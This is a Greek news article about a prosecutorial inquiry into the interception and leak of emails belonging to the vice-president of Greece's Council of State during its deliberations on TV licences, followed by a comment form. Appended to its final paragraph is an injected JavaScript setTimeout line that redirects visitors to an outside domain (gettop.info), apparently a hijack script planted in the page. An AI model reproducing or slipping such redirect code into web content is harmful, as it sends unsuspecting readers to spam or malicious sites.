Εισαγγελική έρευνα για την υποκλοπή των email του αντιπροέδρου του ΣτΕ

0
7

 

Η Eισαγγελία Πρωτοδικών διέταξε κατεπείγουσα προκαταρκτική εξέταση ώστε να διερευνηθεί πώς διέρρευσε και ποιοι υπέκλεψαν τα email του αντιπροέδρου του Συμβουλίου της Επικρατείας, ο οποίος μετέχει στη διάσκεψη για τις τηλεοπτικές άδειες.

Λίγη ώρα μετά, ο υπουργός Δικαιοσύνης διαβίβασε στην εισαγγελέα του Αρείου Πάγου σειρά δημοσιευμάτων που αποτυπώνουν ενδείξεις τέλεσης αξιόποινων πράξεων όπως παραβίαση δεδομένων προσωπικού χαρακτήρα, αποδοχή προϊόντων εγκλήματος, παραβίαση απορρήτου επικοινωνίας προκειμένου εκείνη να προβεί στις δικές της ενέργειες.

Το θέμα προκαλεί αναταράξεις στο Συμβούλιο της Επικρατείας, καθώς δεν θεωρείται τυχαίος ο χρόνος διαρροής των email, αφού συμπίπτει με την κρίσιμη διάσκεψη της Ολομέλειας του Ανώτατου Ακυρωτικού Δικαστηρίου για τις τηλεοπτικές άδειες.

Σημειώνεται ότι προχθές το βράδυ ο υπουργός Δικαιοσύνης Νίκος Παρασκευόπουλος, ζήτησε να ελεγχθεί πειθαρχικά ο ανώτατος δικαστής καθώς φέρεται μέσω των υποκλαπέντων e-mail να έδειξε προσωπικό ενδιαφέρον για υποψήφια της Εθνικής Σχολής Δικαστών, με την οποία διατηρούσε προσωπική σχέση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here